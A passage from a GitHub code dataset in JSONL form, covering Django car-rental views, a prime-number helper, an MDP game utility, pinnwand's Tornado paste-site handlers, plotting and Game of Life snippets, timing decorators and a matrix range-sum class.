request.session['start_date'] = start_date\n request.session['end_date'] = end_date\n request.session['rental_days_amount'] = rental_days_amount\n request.session['reservation_id'] = reservation.id\n\n context['available_cars'] = available_cars\n context['bookings'] = bookings\n context['reservation'] = 
reservation\n return render(request, template, context)\n except:\n return redirect('car_rental:index')\n\n\n\ndef car_detail(request, car_id):\n try:\n template = 'car_detail.html'\n car = Car.objects.get(id=car_id)\n\n request.session['car_id'] = car.id\n\n start_date = request.session['start_date']\n end_date = request.session['end_date']\n reservation_id = request.session['reservation_id']\n car_id = request.session['car_id']\n print(f'this is car id {car_id}')\n context = {}\n context['car'] = car\n context['start_date'] = start_date\n context['end_date'] = end_date\n context['reservation_id'] = reservation_id\n context['car_id'] = car_id\n return render(request, template, context)\n except:\n return redirect('car_rental:index')\n\n\ndef booking_view(request):\n try:\n start_date = request.session['start_date']\n end_date = request.session['end_date']\n car_id = request.session['car_id']\n car = Car.objects.get(id=car_id)\n rental_days_amount = request.session['rental_days_amount']\n rental_days_amount = int(rental_days_amount) * car.car_price_per_day\n # bookings = Booking.objects.all()\n booking = Booking()\n booking.booking_from = start_date\n booking.booking_to = end_date\n booking.booked_car = car\n booking.save()\n template = 'booking.html'\n context = {}\n context['start_date'] = start_date\n context['end_date'] = end_date\n context['car'] = car\n context['booking'] = booking\n context['rental_days_amount'] = rental_days_amount\n del request.session['start_date']\n del request.session['end_date']\n del request.session['car_id']\n return render(request, template, context)\n\n except:\n template = 'empty.html'\n context = {}\n return render(request, template, context)\n","repo_name":"djzib0/car_rental_app","sub_path":"django_project/car_rental/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4939,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"26640948234","text":"import constants as c\n#This will house any functions I use in the program other than the one I use to call the orogram in main\n\n# 1 I need a function to tell me if any given number is a prime (is_prime),\n# 2 then I need a function that returns all primes in a range (calls is_prime) as a list prime_list\n\n#takes a value n and checks to see if it's prime or not\ndef is_prime(num):\n if num > 1:\n for n in range(2, num):\n if num % n != 0 and num not in c.SKIP:\n continue\n else:\n return False\n return True\n# print(is_prime(18))\n\n#uses is_prime fucntion to return a list of prime numbers when min and max are defined\ndef list_prime(min, max):\n prime_list = []\n for num in range(min, max):\n if is_prime(num):\n prime_list.append(num)\n return prime_list\n\n","repo_name":"JuicyMag/Primer-Returner","sub_path":"functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":843,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"6354679078","text":"from Web_Server.game_backend.game_data.settings import REWARDS,ACTIONS,MDP_file_path\nfrom Web_Server.game_backend.game_data.worlds import WORLDS\nimport numpy as np\nfrom math import dist\nfrom collections import namedtuple\n\n\ndef main():\n iworld = 1\n MDP = MDP_DataClass(iworld)\n\nclass Struct:\n def __init__(self, **entries):\n self.__dict__.update(entries)\n\nclass MDP_DataClass(object):\n \"\"\"\n NORMALIZE TRANSITION PROBS\n \"\"\"\n def __init__(self, iworld, init_penalties=True,MDP_path=None):\n self.iworld = 
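# --- Aside: a hedged sketch of a sieve-based prime lister (illustrative). ---
# Trial division as in is_prime()/list_prime() above costs O(n) per candidate;
# a Sieve of Eratosthenes lists every prime below `limit` in about O(n log log n).
def sieve_primes(limit):
    is_composite = [False] * limit
    primes = []
    for n in range(2, limit):
        if not is_composite[n]:
            primes.append(n)
            for multiple in range(n * n, limit, n):
                is_composite[multiple] = True
    return primes

# Example: sieve_primes(20) -> [2, 3, 5, 7, 11, 13, 17, 19]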
iworld\n        self.P_pen = REWARDS['player_Ppenalty']\n        self.R_pen = REWARDS['player_Rpenalty']\n        self.start = WORLDS[iworld]['start']\n        S, A, T, R_player, R_evader = load_MDP() if MDP_path is None else load_MDP(MDP_path)\n\n\n        # Agent Space #######################\n        agent_space = {}\n        agent_space['S'] = get_adm_agent_states()\n        agent_space['A'] = ACTIONS['list']\n        agent_space['nS'] = np.shape(agent_space['S'])[0]\n        agent_space['nA'] = np.shape(agent_space['A'])[0]\n        agent_space['T'] = None\n        agent_space['R_player'] = R_player\n        agent_space['R_evader'] = R_evader\n        self.agent = Struct(**agent_space)\n\n        # Joint Space #######################\n\n        nS = np.shape(S)[0]  # joint states\n        nA = np.shape(A)[0]\n        if init_penalties: R_player, self.Si_pen = penalty_init(iworld, S, R_player, self.P_pen, self.R_pen)\n        else: self.Si_pen = None\n        Si_terminal = np.array([is_caught(S[si]) for si in range(nS)]).T\n\n        joint_space = {}\n        joint_space['S'] = S\n        joint_space['A'] = A\n        joint_space['T'] = T\n        joint_space['nS'] = nS\n        joint_space['nA'] = nA\n        joint_space['R_player'] = R_player\n        joint_space['R_evader'] = R_evader\n        joint_space['Si_terminal'] = Si_terminal\n\n        self.joint = Struct(**joint_space)\n\n        # self.S, self.A, self.T, self.R_player, self.R_evader = load_MDP()\n        # if init_penalties:\n        #     self.R_player, self.Si_pen = penalty_init(iworld, self.S, self.R_player, self.P_pen, self.R_pen)\n        # else:\n        #     self.Si_pen = None\n        # self.Si_terminal = np.array([is_caught(self.S[si]) for si in range(self.nS)]).T\n        # self.nS = np.shape(self.S)[0]  # joint states\n        # self.nAgents = 3\n        # self.nA = np.shape(self.A)[0]\n        # self.n_actions = 5  # single agent actions\n\n#########################################################################\n####### FUNCTIONS+UTILS #################################################\n\ndef penalty_init(iworld,S,R_player,P_pen,R_pen,nAgents=3):\n    is_centralized = np.shape(R_player)[0]>1\n\n    nS = np.shape(R_player)[0]\n    world = WORLDS[iworld]['array']\n    pen_states = np.array(np.where(world == WORLDS['pen_val'])).T\n    Si_pen = np.zeros([nS,nAgents])\n    for pen_state in pen_states:\n        for player in [0,1]:\n            i_pen_states = np.where(np.all(S[:, player,:] == pen_state,axis=1))\n            Si_pen[i_pen_states,player]=1\n            if is_centralized: R_player[i_pen_states,player] += P_pen*R_pen\n            if player==0: R_player[i_pen_states] += P_pen*R_pen\n    return R_player,Si_pen\n\ndef get_adm_agent_states():\n    \"\"\"\n    Gets admissible states of a single agent\n    :return:\n    \"\"\"\n    world = WORLDS['empty_world']['array']\n    empty_val = WORLDS['empty_val']\n    player_states = np.array(np.where(world == empty_val)).T\n    return player_states\n\ndef are_adjacent(statei,statej):\n    adjacent = True\n    d1 = dist(statei[0], statej[0])\n    d2 = dist(statei[1], statej[1])\n    d3 = dist(statei[2], statej[2])\n    if not(d1 == 1 or d1==0): adjacent = False\n    if not(d2 == 1 or d2==0): adjacent = False\n    if not(d3 == 1 or d3==0): adjacent = False\n    return adjacent\ndef contains_border(world,border_val,state):\n    has_border = False\n    r1,c1 = state[0]\n    r2, c2 = state[1]\n    r3, c3 = state[2]\n    if world[r1, c1] == border_val: has_border =True\n    if world[r2, c2] == border_val: has_border = True\n    if world[r3, c3] == border_val: has_border = True\n    return has_border\ndef is_caught(state):\n    caught = True\n    d1 = dist(state[0], state[2])  # p1 to evader\n    d2 = dist(state[1], state[2])  # p2 to evader\n    if not(d1 == 1 or d1==0): caught = False\n    if not(d2 == 1 or d2==0): caught = False\n    return caught\ndef evader_Rdist(state):\n    scale = REWARDS['evader_scale_Rdist']\n    
d_max = dist([1,1], [5,5])\n r_max = pow(d_max, 2) + pow(d_max, 2)\n # r_max = 64 # maximum distance across board\n d1 = dist(state[0], state[2]) # p1 to evader\n d2 = dist(state[1], state[2]) # p2 to evader\n return scale*(pow(d1,2) + pow(d2,2))/r_max\n\ndef player1_Rdist(state):\n scale = REWARDS['player_scale_Rdist']\n d_max = dist([1,1],[5,5])\n r_max = (d_max-dist([1,1],[1,1]))\n d1 = dist(state[0], state[2]) # p1 to evader\n # return scale*(d1)/r_max\n return scale * (d_max-d1)/r_max\n\n\n#########################################################################\n####### DATA MANAGEMENT #################################################\ndef save_MDP(file_name, S, A,T,R_player,R_evader,REWARDS):\n np.savez_compressed(file_name, S=S, A=A,T=T,R_player=R_player,R_evader=R_evader,REWARDS=REWARDS)\n # with open('MDP/States.pkl', 'wb') as handle:\n # pickle.dump(S, handle, protocol=pickle.HIGHEST_PROTOCOL)\n # with open('MDP\\\\States.pkl', 'wb') as handle:\n # pickle.dump(S, handle, protocol=pickle.HIGHEST_PROTOCOL)\n # with open('MDP\\\\Actions.pkl', 'wb') as handle:\n # pickle.dump(S, handle, protocol=pickle.HIGHEST_PROTOCOL)\n # with open('MDP\\\\Trans.pkl', 'wb') as handle:\n # pickle.dump(T, handle, protocol=pickle.HIGHEST_PROTOCOL)\ndef load_MDP(file_name=MDP_file_path):\n # try: loaded = np.load(file_name + '.npz')\n # except: loaded = np.load('MDP/'+file_name + '.npz')\n\n loaded = np.load(file_name + '.npz')\n return loaded['S'],loaded['A'],loaded['T'],loaded['R_player'],loaded['R_evader']\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"mosmith3asu/WebServer_Project","sub_path":"Web_Server/game_backend/scripts/MDP_tools.py","file_name":"MDP_tools.py","file_ext":"py","file_size_in_byte":6054,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"39730840730","text":"import binascii\nimport io\nimport logging\nimport zipfile\nfrom datetime import datetime\nfrom typing import Any\n\nimport docutils.core\nimport tornado.web\n\nfrom pinnwand import configuration, database, defensive, error, path, utility\n\nlog = logging.getLogger(__name__)\n\n\nclass Base(tornado.web.RequestHandler):\n \"\"\"Base page for all 'web' pages to inherit from. 
This page handles\n    default methods for GET and POST but more importantly overwrites\n    `write_error` to render error pages.\n\n    It automatically converts ValidationError to a 400 error page but leaves\n    other HTTPErrors alone.\"\"\"\n\n    def write_error(self, status_code: int, **kwargs: Any) -> None:\n        if status_code == 404:\n            self.render(\n                \"error.html\",\n                text=\"That page does not exist\",\n                status_code=404,\n                pagetitle=\"error\",\n            )\n        else:\n            type_, exc, traceback = kwargs[\"exc_info\"]\n\n            if type_ == error.ValidationError:\n                self.set_status(400)\n                self.render(\n                    \"error.html\",\n                    text=str(exc),\n                    status_code=400,\n                    pagetitle=\"error\",\n                )\n            elif type_ == error.RatelimitError:\n                self.set_status(429)\n                self.render(\n                    \"error.html\",\n                    text=str(exc),\n                    status_code=429,\n                    pagetitle=\"error\",\n                )\n            elif type_ == error.SpamError:\n                self.set_status(451)\n                self.render(\n                    \"error.html\",\n                    text=str(exc),\n                    status_code=451,\n                    pagetitle=\"error\",\n                )\n            else:\n                self.render(\n                    \"error.html\",\n                    text=\"unknown error\",\n                    status_code=500,\n                    pagetitle=\"error\",\n                )\n\n    async def get(self) -> None:\n        raise tornado.web.HTTPError(404)\n\n    async def post(self) -> None:\n        raise tornado.web.HTTPError(405)\n\n\nclass Create(Base):\n    \"\"\"The index page shows the new paste page with a list of all available\n    lexers from Pygments.\"\"\"\n\n    async def get(self, lexers: str = \"\") -> None:\n        \"\"\"Render the new paste form, optionally have a lexer preselected from\n        the URL.\"\"\"\n\n        if defensive.ratelimit(self.request, area=\"read\"):\n            raise error.RatelimitError()\n\n        lexers_available = utility.list_languages()\n        lexers_selected = [\n            lexer for lexer in lexers.split(\"+\") if lexer.strip()\n        ]\n\n        if not lexers_selected:\n            lexers_selected = [configuration.default_selected_lexer]\n\n        # Make sure all lexers are available\n        if not all(lexer in lexers_available for lexer in lexers_selected):\n            log.debug(\"CreatePaste.get: non-existent lexer requested\")\n            raise tornado.web.HTTPError(404)\n\n        await self.render(\n            \"create.html\",\n            expiries=configuration.expiries,\n            lexers=lexers_selected,\n            lexers_available=lexers_available,\n            pagetitle=\"Create new paste\",\n            message=None,\n            paste=None,\n        )\n\n    async def post(self) -> None:\n        \"\"\"This is a historical endpoint to create pastes, pastes are marked as\n        old-web and will get a warning on top of them to remove any access to\n        this route.\n\n        pinnwand has since evolved with an API which should be used and a\n        multi-file paste.\n\n        See the 'CreateAction' for the new-style creation of pastes.\"\"\"\n\n        lexer = self.get_body_argument(\"lexer\")\n        raw = self.get_body_argument(\"code\", strip=False)\n        expiry = self.get_body_argument(\"expiry\")\n\n        if defensive.ratelimit(self.request, area=\"create\"):\n            raise error.RatelimitError()\n\n        if lexer not in utility.list_languages():\n            log.info(\"Paste.post: a paste was submitted with an invalid lexer\")\n            raise tornado.web.HTTPError(400)\n\n        # Guard against empty strings\n        if not raw or not raw.strip():\n            return self.redirect(f\"/+{lexer}\")\n\n        if expiry not in configuration.expiries:\n            log.info(\"Paste.post: a paste was submitted with an invalid expiry\")\n            raise tornado.web.HTTPError(400)\n\n        paste = database.Paste(\n            utility.slug_create(),\n            configuration.expiries[expiry],\n            \"deprecated-web\",\n        )\n        file = database.File(paste.slug, raw, lexer)\n        paste.files.append(file)\n\n        with database.session() as session:\n            session.add(paste)\n            session.commit()\n\n        # The removal cookie is set for the specific path of the 
paste it is\n # related to\n self.set_cookie(\n \"removal\", str(paste.removal), path=f\"/{paste.slug}\"\n )\n\n # Send the client to the paste\n self.redirect(f\"/{paste.slug}\")\n\n def check_xsrf_cookie(self) -> None:\n \"\"\"The CSRF token check is disabled. While it would be better if it\n was on the impact is both small (someone could make a paste in\n a users name which could allow pinnwand to be used as a vector for\n exfiltration from other XSS) and some command line utilities\n POST directly to this endpoint without using the JSON endpoint.\"\"\"\n return\n\n\nclass CreateAction(Base):\n \"\"\"The create action is the 'new' way to create pastes and supports multi\n file pastes.\"\"\"\n\n def post(self) -> None: # type: ignore\n \"\"\"POST handler for the 'web' side of things.\"\"\"\n\n if defensive.ratelimit(self.request, area=\"create\"):\n raise error.RatelimitError()\n\n expiry = self.get_body_argument(\"expiry\")\n\n if expiry not in configuration.expiries:\n log.info(\n \"CreateAction.post: a paste was submitted with an invalid expiry\"\n )\n raise error.ValidationError()\n\n auto_scale = self.get_body_argument(\"long\", None) is None\n\n lexers = self.get_body_arguments(\"lexer\")\n raws = self.get_body_arguments(\"raw\", strip=False)\n filenames = self.get_body_arguments(\"filename\")\n\n if not all([lexers, raws, filenames]):\n # Prevent empty argument lists from making it through\n raise error.ValidationError()\n\n if not all(raw.strip() for raw in raws):\n # Prevent empty raws from making it through\n raise error.ValidationError()\n\n if any(len(L) != len(lexers) for L in [lexers, raws, filenames]):\n log.info(\"CreateAction.post: mismatching argument lists\")\n raise error.ValidationError()\n\n if any(lexer not in utility.list_languages() for lexer in lexers):\n log.info(\"CreateAction.post: a file had an invalid lexer\")\n raise error.ValidationError()\n\n with database.session() as session, utility.SlugContext(\n auto_scale\n ) as slug_context:\n paste = database.Paste(\n next(slug_context), configuration.expiries[expiry], \"web\"\n )\n\n for lexer, raw, filename in zip(lexers, raws, filenames):\n paste.files.append(\n database.File(\n next(slug_context),\n raw,\n lexer,\n filename if filename else None,\n )\n )\n\n if sum(len(f.fmt) for f in paste.files) > configuration.paste_size:\n log.info(\"CreateAction.post: sum of files was too large\")\n raise error.ValidationError()\n\n # For the first file we will always use the same slug as the paste,\n # since slugs are generated to be unique over both pastes and files\n # this can be done safely.\n paste.files[0].slug = paste.slug\n\n session.add(paste)\n session.commit()\n\n # The removal cookie is set for the specific path of the paste it is\n # related to\n self.set_cookie(\n \"removal\", str(paste.removal), path=f\"/{paste.slug}\"\n )\n\n # Send the client to the paste\n self.redirect(f\"/{paste.slug}\")\n\n\nclass Repaste(Base):\n \"\"\"Repaste is a specific case of the paste page. 
It only works for pre-\n existing pastes and will prefill the textarea and lexer.\"\"\"\n\n async def get(self, slug: str) -> None: # type: ignore\n \"\"\"Render the new paste form, optionally have a lexer preselected from\n the URL.\"\"\"\n\n if defensive.ratelimit(self.request, area=\"read\"):\n raise error.RatelimitError()\n\n with database.session() as session:\n paste = (\n session.query(database.Paste)\n .filter(database.Paste.slug == slug)\n .first()\n )\n\n if not paste:\n raise tornado.web.HTTPError(404)\n\n lexers_available = utility.list_languages()\n\n await self.render(\n \"create.html\",\n expiries=configuration.expiries,\n lexers=[\"text\"], # XXX make this majority of file lexers?\n lexers_available=lexers_available,\n pagetitle=\"repaste\",\n message=None,\n paste=paste,\n )\n\n\nclass Show(Base):\n \"\"\"Show a paste.\"\"\"\n\n async def get(self, slug: str) -> None: # type: ignore\n \"\"\"Fetch paste from database by slug and render the paste.\"\"\"\n\n if defensive.ratelimit(self.request, area=\"read\"):\n raise error.RatelimitError()\n\n with database.session() as session:\n paste = (\n session.query(database.Paste)\n .filter(database.Paste.slug == slug)\n .first()\n )\n\n if not paste:\n raise tornado.web.HTTPError(404)\n\n if paste.exp_date < datetime.utcnow():\n session.delete(paste)\n session.commit()\n\n log.warn(\n \"Show.get: paste was expired, is your cronjob running?\"\n )\n\n raise tornado.web.HTTPError(404)\n\n can_delete = self.get_cookie(\"removal\") == str(paste.removal)\n\n self.render(\n \"show.html\",\n paste=paste,\n pagetitle=f\"View paste {paste.slug}\",\n can_delete=can_delete,\n linenos=False,\n )\n\n\nclass RedirectShow(Base):\n \"\"\"Redirect old-style \"/show/\" paths to new-style \"/\" paths.\"\"\"\n\n async def get(self, slug: str) -> None: # type: ignore\n \"\"\"Fetch paste from database and redirect to /slug if the paste\n exists.\"\"\"\n with database.session() as session:\n paste = (\n session.query(database.Paste)\n .filter(database.Paste.slug == slug)\n .first()\n )\n\n if not paste:\n raise tornado.web.HTTPError(404)\n\n if paste.exp_date < datetime.utcnow():\n session.delete(paste)\n session.commit()\n\n log.warn(\n \"RedirectShow.get: paste was expired, is your cronjob running?\"\n )\n\n raise tornado.web.HTTPError(404)\n\n self.redirect(f\"/{paste.slug}\")\n\n\nclass FileRaw(Base):\n \"\"\"Show a file as plaintext.\"\"\"\n\n async def get(self, file_id: str) -> None: # type: ignore\n \"\"\"Get a file from the database and show it in the plain.\"\"\"\n\n if defensive.ratelimit(self.request, area=\"read\"):\n raise error.RatelimitError()\n\n with database.session() as session:\n file = (\n session.query(database.File)\n .filter(database.File.slug == file_id)\n .first()\n )\n\n if not file:\n raise tornado.web.HTTPError(404)\n\n if file.paste.exp_date < datetime.utcnow():\n session.delete(file.paste)\n session.commit()\n\n log.warn(\n \"FileRaw.get: paste was expired, is your cronjob running?\"\n )\n\n raise tornado.web.HTTPError(404)\n\n self.set_header(\"Content-Type\", \"text/plain; charset=utf-8\")\n self.write(file.raw)\n\n\nclass FileHex(Base):\n \"\"\"Show a file as hexadecimal.\"\"\"\n\n async def get(self, file_id: str) -> None: # type: ignore\n \"\"\"Get a file from the database and show it in hex.\"\"\"\n\n if defensive.ratelimit(self.request, area=\"read\"):\n raise error.RatelimitError()\n\n with database.session() as session:\n file = (\n session.query(database.File)\n .filter(database.File.slug == file_id)\n .first()\n 
)\n\n if not file:\n raise tornado.web.HTTPError(404)\n\n if file.paste.exp_date < datetime.utcnow():\n session.delete(file.paste)\n session.commit()\n\n log.warn(\n \"FileRaw.get: paste was expired, is your cronjob running?\"\n )\n\n raise tornado.web.HTTPError(404)\n\n self.set_header(\"Content-Type\", \"text/plain; charset=utf-8\")\n self.write(binascii.hexlify(file.raw.encode(\"utf8\")))\n\n\nclass PasteDownload(Base):\n \"\"\"Download an entire paste.\"\"\"\n\n async def get(self, paste_id: str) -> None: # type: ignore\n \"\"\"Get all files from the database and download them as a zipfile.\"\"\"\n\n if defensive.ratelimit(self.request, area=\"read\"):\n raise error.RatelimitError()\n\n with database.session() as session:\n paste = (\n session.query(database.Paste)\n .filter(database.Paste.slug == paste_id)\n .first()\n )\n\n if not paste:\n raise tornado.web.HTTPError(404)\n\n if paste.exp_date < datetime.utcnow():\n session.delete(paste)\n session.commit()\n\n log.warn(\n \"FileRaw.get: paste was expired, is your cronjob running?\"\n )\n\n raise tornado.web.HTTPError(404)\n\n data = io.BytesIO()\n\n with zipfile.ZipFile(data, \"x\") as zf:\n for file in paste.files:\n if file.filename:\n filename = f\"{utility.filename_clean(file.filename)}-{file.slug}.txt\"\n else:\n filename = f\"{file.slug}.txt\"\n\n zf.writestr(filename, file.raw)\n\n data.seek(0)\n\n self.set_header(\"Content-Type\", \"application/zip\")\n self.set_header(\n \"Content-Disposition\", f\"attachment; filename={paste.slug}.zip\"\n )\n self.write(data.read())\n\n\nclass FileDownload(Base):\n \"\"\"Download a file.\"\"\"\n\n async def get(self, file_id: str) -> None: # type: ignore\n \"\"\"Get a file from the database and download it in the plain.\"\"\"\n\n if defensive.ratelimit(self.request, area=\"read\"):\n raise error.RatelimitError()\n\n with database.session() as session:\n file = (\n session.query(database.File)\n .filter(database.File.slug == file_id)\n .first()\n )\n\n if not file:\n raise tornado.web.HTTPError(404)\n\n if file.paste.exp_date < datetime.utcnow():\n session.delete(file.paste)\n session.commit()\n\n log.warn(\n \"FileDownload.get: paste was expired, is your cronjob running?\"\n )\n\n raise tornado.web.HTTPError(404)\n\n self.set_header(\"Content-Type\", \"text/plain; charset=utf-8\")\n\n if file.filename:\n filename = (\n f\"{utility.filename_clean(file.filename)}-{file.slug}.txt\"\n )\n else:\n filename = f\"{file.slug}.txt\"\n\n self.set_header(\n \"Content-Disposition\", f\"attachment; filename={filename}\"\n )\n self.write(file.raw)\n\n\nclass Remove(Base):\n \"\"\"Remove a paste.\"\"\"\n\n async def get(self, removal: str) -> None: # type: ignore\n \"\"\"Look up if the user visiting this page has the removal id for a\n certain paste. 
If they do they're authorized to remove the paste.\"\"\"\n\n if defensive.ratelimit(self.request, area=\"delete\"):\n raise error.RatelimitError()\n\n with database.session() as session:\n paste = (\n session.query(database.Paste)\n .filter(database.Paste.removal == removal)\n .first()\n )\n\n if not paste:\n log.info(\"RemovePaste.get: someone visited with invalid id\")\n raise tornado.web.HTTPError(404)\n\n if paste.exp_date < datetime.utcnow():\n session.delete(paste)\n session.commit()\n\n log.warn(\n \"Remove.get: paste was expired, is your cronjob running?\"\n )\n\n raise tornado.web.HTTPError(404)\n\n session.delete(paste)\n session.commit()\n\n self.redirect(\"/\")\n\n\nclass RestructuredTextPage(Base):\n \"\"\"Render a given file as RestructuredText.\"\"\"\n\n def initialize(self, file: str) -> None:\n self.file = file\n\n async def get(self) -> None:\n if defensive.ratelimit(self.request, area=\"read\"):\n raise error.RatelimitError()\n\n try:\n with open(path.page / self.file) as f:\n html = docutils.core.publish_parts(\n f.read(), writer_name=\"html\"\n )[\"html_body\"]\n except FileNotFoundError:\n raise tornado.web.HTTPError(404)\n\n self.render(\n \"restructuredtextpage.html\",\n html=html,\n pagetitle=(path.page / self.file).stem,\n )\n\n\nclass Logo(Base):\n \"\"\"Render an image file at the logo path.\"\"\"\n\n def initialize(self, path: str) -> None:\n self.path = path\n\n async def get(self) -> None:\n self.set_header(\"Content-Type\", \"image/png\")\n\n with open(self.path, \"rb\") as f:\n self.write(f.read())\n","repo_name":"supakeen/pinnwand","sub_path":"src/pinnwand/handler/website.py","file_name":"website.py","file_ext":"py","file_size_in_byte":18540,"program_lang":"python","lang":"en","doc_type":"code","stars":150,"dataset":"github-code","pt":"27"} +{"seq_id":"4053938315","text":"import matplotlib.pyplot as plt\n# Change the line plot below to a scatter plot\nplt.scatter(gdp_cap, life_exp)\n\n# Put the x-axis on a logarithmic scale\nplt.xscale('log')\n\n# Strings\nxlab = 'GDP per Capita [in USD]'\nylab = 'Life Expectancy [in years]'\ntitle = 'World Development in 2007'\n\n# Add axis labels\nplt.xlabel(xlab)\nplt.ylabel(ylab)\nplt.title(title)\n\n# Show plot\nplt.show()","repo_name":"Nishant1027/my-matplot","sub_path":"label&function.py","file_name":"label&function.py","file_ext":"py","file_size_in_byte":378,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"27"} +{"seq_id":"18128488964","text":"# -*- coding: utf-8 -*-\n\nfrom PIL.BmpImagePlugin import BmpImageFile\nfrom PIL import Image\nfrom aiida.orm import Data\n\n\nclass GOLSystem(Data):\n \"\"\"\n This is a data node for Conway's Game of Life\n \"\"\"\n def __init__(self, array=None, **kwargs):\n \"\"\"\n :param array: numpy array of booleans, True = alive, False = dead\n \"\"\"\n\n super(Data, self).__init__(**kwargs)\n\n if isinstance(array, BmpImageFile):\n array = array.convert('1')\n width, height = array.size\n array = [[bool(array.getpixel((ii, jj))) for ii in range(width)]\n for jj in range(height)]\n else:\n array = [[bool(array[ii, jj]) for ii in range(array.shape[0])]\n for jj in range(array.shape[1])]\n\n self.set_attribute('array', array)\n\n def as_array(self):\n return self.get_attribute('array')\n\n def get_dimensions(self):\n array = self.as_array()\n return len(array[0]), len(array)\n\n def get_bitmap(self):\n width, height = self.get_dimensions()\n array = self.as_array()\n img = Image.new('1', (width, height), 0)\n for ii in range(width):\n for jj 
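# --- Aside: a hedged sketch of one Conway step over the same list-of-lists-of-bool
# representation as GOLSystem.as_array() above (True = alive). Toroidal wrap-around
# at the edges is an assumption made for this sketch.
def gol_step(cells):
    height, width = len(cells), len(cells[0])

    def live_neighbours(r, c):
        # bools sum as 0/1, so this counts the live cells among the 8 neighbours
        return sum(
            cells[(r + dr) % height][(c + dc) % width]
            for dr in (-1, 0, 1)
            for dc in (-1, 0, 1)
            if (dr, dc) != (0, 0)
        )

    nxt = []
    for r in range(height):
        row = []
        for c in range(width):
            n = live_neighbours(r, c)
            # birth on exactly 3 neighbours, survival on 2 or 3
            row.append(n == 3 or (cells[r][c] and n == 2))
        nxt.append(row)
    return nxt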
in range(height):\n                img.putpixel((ii, jj), int(array[jj][ii]))  # rows are indexed by jj, columns by ii\n        return img\n","repo_name":"addman2/aiida-python","sub_path":"example/gol/system.py","file_name":"system.py","file_ext":"py","file_size_in_byte":1305,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"29458728716","text":"# coding=utf-8\r\n# -*- coding: utf-8 -*-\r\n\r\n\r\nimport arrow\r\nimport numpy as np\r\n\r\nfrom functools import wraps\r\n\r\n#\r\nimport matplotlib as mpl\r\nimport matplotlib.colors\r\nfrom matplotlib import cm\r\n\r\n#\r\nimport zsys\r\nimport ztools as zt\r\nimport ztools_str as zstr\r\nimport ztools_web as zweb\r\n\r\nzt_fun_tst_time_nloop = 5\r\n\r\n\r\ndef fun_tim01(function):\r\n    @wraps(function)\r\n    def fun_tim(*args, **kwargs):\r\n        t0 = arrow.now()\r\n        result = function(*args, **kwargs)\r\n        tn = zt.timNSec(arrow.now(), t0)\r\n        print('tn,{0:.3f}s,fun:{1}'.format(tn, function.__name__))\r\n        return result\r\n    return fun_tim\r\n\r\n\r\ndef fun_timer(function):\r\n    @wraps(function)\r\n    def function_timer(*args, **kwargs):\r\n        xt0 = 999999\r\n        xt9 = 0\r\n        xtn = 0\r\n        xtsum = 0\r\n        for xc in range(zt_fun_tst_time_nloop):\r\n            t0 = arrow.now()\r\n            # tfn = function(*args, **kwargs)\r\n            t1 = arrow.now()\r\n            xtn = t1 - t0\r\n            xt0 = min(xt0, xtn)\r\n            xt9 = max(xt9, xtn)\r\n            xtsum = xtsum + xtn\r\n            # print (\" %d # ,t:%.4f s,t.min:%.4f s, t.max:%.4f s, t.sum:%.4f\r\n            # s \" % (xc,xtn,xt0,xt9,xtsum))\r\n\r\n        #\r\n        xt5 = xtsum / zt.zt_fun_tst_time_nloop\r\n        # print('')\r\n        # print('xt5,',xt5,zt_fun_tst_time_nloop)\r\n        # print (\" %d # trd, %.4f s\" % (args[1],t1-t0))\r\n        print(\" %d # trd, t:%.6f s, t0:%.6f s, t9:%.6f s\" %\r\n              (args[1], xt5, xt0, xt9))\r\n\r\n        # print('var',args[1])\r\n        return xt5, xt0, xt9\r\n\r\n    return function_timer\r\n\r\n\r\ndef fun_tim050(func, dat, css):\r\n    xt0 = 999999\r\n    xt9 = 0\r\n    xtn = 0\r\n    xtsum = 0\r\n    for xc in range(zt_fun_tst_time_nloop):\r\n        t0 = arrow.now()\r\n        func(dat)\r\n        t1 = arrow.now()\r\n        xtn = t1 - t0\r\n        xt0 = min(xt0, xtn)\r\n        xt9 = max(xt9, xtn)\r\n        xtsum = xtsum + xtn\r\n    #\r\n    xt5 = xtsum / zt_fun_tst_time_nloop\r\n    print(\"%s,%s, t:%.6f s, t0:%.6f s, t9:%.6f s,nloop:%d\" %\r\n          (css, func.__name__, xt5, xt0, xt9, zt_fun_tst_time_nloop))\r\n    # print('tn:%.6f,%s'%(t1-t0,func.__name__))\r\n\r\n\r\ndef fun_tim010(func, dat):\r\n\r\n    t0 = arrow.now()\r\n    func(dat)\r\n    t1 = arrow.now()\r\n    print('tn:%.6f,%s' % (t1 - t0, func.__name__))\r\n\r\n\r\ndef fun_tim010call():\r\n    # arr = np.arange(9999999).reshape(3333333, 3)\r\n    dnum = 50000000\r\n    d_np = np.arange(dnum)\r\n\r\n    # zz_tst010(abs001,d_np,'py tn:')\r\n    # zz_tst010(abs001_nb,d_np,'nb tn:')\r\n    # zz_tst010(abs001_ex,d_np,'ex tn:')\r\n    #\r\n    # fun_tim010(sum2d,arr)\r\n    # fun_tim010(sum2d_nb,arr)\r\n","repo_name":"haiya512/football.bobo","sub_path":"ztools_tst.py","file_name":"ztools_tst.py","file_ext":"py","file_size_in_byte":2609,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"27"} +{"seq_id":"37402546098","text":"from typing import List\n\n\nclass NumMatrix:\n    \n    def __init__(self, matrix: List[List[int]]):\n        row = len(matrix)\n        col = len(matrix[0])\n        self.matrix = matrix.copy()\n        for i in range(row):\n            for j in range(1,col):\n                self.matrix[i][j] = self.matrix[i][j-1] + self.matrix[i][j]\n\n\n    def sumRegion(self, row1: int, col1: int, row2: int, col2: int) -> int:\n        sum = 0\n        for i in range(row1,row2 + 1):\n            if col1 == 0:\n                sum += self.matrix[i][col2]\n            else:\n                sum = sum + self.matrix[i][col2] - self.matrix[i][col1-1]\n        return 
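# --- Aside: a hedged sketch extending the row-wise running sums above to full 2D
# prefix sums, making each region query O(1) instead of O(rows). Illustrative class.
class PrefixSumMatrix:
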